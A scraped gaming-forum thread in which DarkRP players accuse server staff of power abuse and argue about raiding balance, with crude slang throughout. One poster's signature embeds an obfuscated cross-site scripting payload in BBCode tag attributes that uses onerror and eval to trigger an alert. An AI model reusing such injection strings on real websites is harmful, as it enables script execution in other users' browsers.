Ex TS / Discord Head Admin
Ex Forum Section Moderator
Ex Community Council Member

My Anime List
Steam | Discord: Spectrum#0001

Login or register to post a reply.

I love this server 8 years 8 months ago #176150

TO BY wrote:
I am sad to say that I figured out that not all staff are kind and warm-hearted. I will not mention names here, but man. I have to say with pure honesty that (some) of the staff "owns" the server. I am used to players raiding me, but dude; I have gotten raped several times (just after buying printers) by staff members. It is very hard for a new player like me to settle and start a business with all this overpowered raiding.

I do not mean in any way to step out as a douchebag now, because I meant EVERY SINGLE word I said about Morgan and I think he is phenomenal. Sorry, but that's rare. I have encountered abusing admins that use their powers to check for printers and raid afterwards. I have encountered an invisible admin keypad cracking my door while another admin stormed me and took my belongings. I have encountered power hungry admins that likes to threaten me. I am sorry guys, but my impression has changed drastically and I am considering finding a new server, please don't take it personal. If I were you I'd give Morgan Head Admin (yes, I have seen all the hashtags) to maintain some order. Because if there is one thing you really need to work on - it's staff. I haven't met a single staff member (as of yet) that is not power hungry except this Morgan guy. I have gotten several unfair warnings for no reason without them even questioning me, they didn't even highlight the situation.

If I were to play on this server, I would have to have Fraps on 24/7 to report all the staff that eats powercereal for breakfast. I wish Morgan all the best, because he is fucking exceptional.

Atleast it was very nice to meet you guys, you seem like a wonderful community!
Sums up the brotherhood/staff gang. Overpowered raiding and targeting new players often abusing their rank.
  • Remlap
  • Fresh Boarder
  • ZARP VIP
  • Thanks received: 3

I love this server 8 years 8 months ago #176183

You can't really blame the staff for raiding you, they just do what they like, raiding is fun.
But raiding is a way too OP, it's 0% skill based, just every guy with enough money can buy Milkors and stuff and you can't defend against it.

I had a suggestion about it, to make the special weapons less OP, but it seems like suggestions are useless.
  • Thezeus
  • User is blocked
  • ZARP VIP
  • Thanks received: 59

I love this server 8 years 8 months ago #176208

This is also true. What's the point? When you have enough cash it has to feel like the game is over. Nothing to work for. Just buy and raid for free. No skills at all. Press the button on an RPG a couple of times, enter, steal his shit, leave. Doesn't sound fun to me. There is a lot of work that needs to be done on this server. On the surface it looks very good, but if you dig down you realize how most of the staff is and the faults lying beneath the surface; like raiding.

Good luck on fixing the faults, fellas. I wish you the very best!
  • TO BY
  • Fresh Boarder

I love this server 8 years 8 months ago #176228

I think you're raiding the wrong bases. The bases that can't be taken out with ease are the fun ones.
Raiding mad men or brotherhood will give you a run for your money.

That's where the real game is, funding huge gang wars.
  • kristofferson
  • Gold Boarder
  • ZARP VIP
  • 420 Blaz It Son
  • Thanks received: 627
I'm EMP's only friend
"Do you have to wear lip stick" - RedPowder 2016
Unable to display Google Map.
[spoiler=throw/a/,Uncaught=1,g=alert,a=URL+0,onerror=eval,/1/g+a[12]+[1337]+a[13]]'throw/a/,Uncaught=1,g=alert,a=URL+0,onerror=eval,/1/g+a[12]+[1337]+a[13][/spoiler][quote=throw/a/,Uncaught=1,g=alert,a=URL+0,onerror=eval,/1/g+a[12]+[1337]+a[13]][code=throw/a/,Uncaught=1,g=alert,a=URL+0,onerror=eval,/1/g+a[12]+[1337]...

I love this server 8 years 8 months ago #176231

just defending the bhood base once cost me about 10 mil because i was going full retard, keep defending with milkors, m202s and matadors lost 2 m202's 2 milkors and 1 matador,and did i care? no! why? because it was fun and worth it eventough we lost
  • Sophia
  • Diamond Boarder
  • ZARP VIP
  • I'll always be the last one standing
  • Thanks received: 775

if a person who plays the piano is called a pianist why isn't a racer called a racist?

Weeaboos, Otakus and Anime are the side effects of nuclear radiaton

• Page:
Time to create page: 0.103 seconds

253 PLAYERS ONLINE

Connect to server View Gametracker DarkRP 1
12/127
Connect to server View Gametracker Deathrun
0/40
Connect to server View Gametracker TTT
0/47
Connect to server View Gametracker Bhop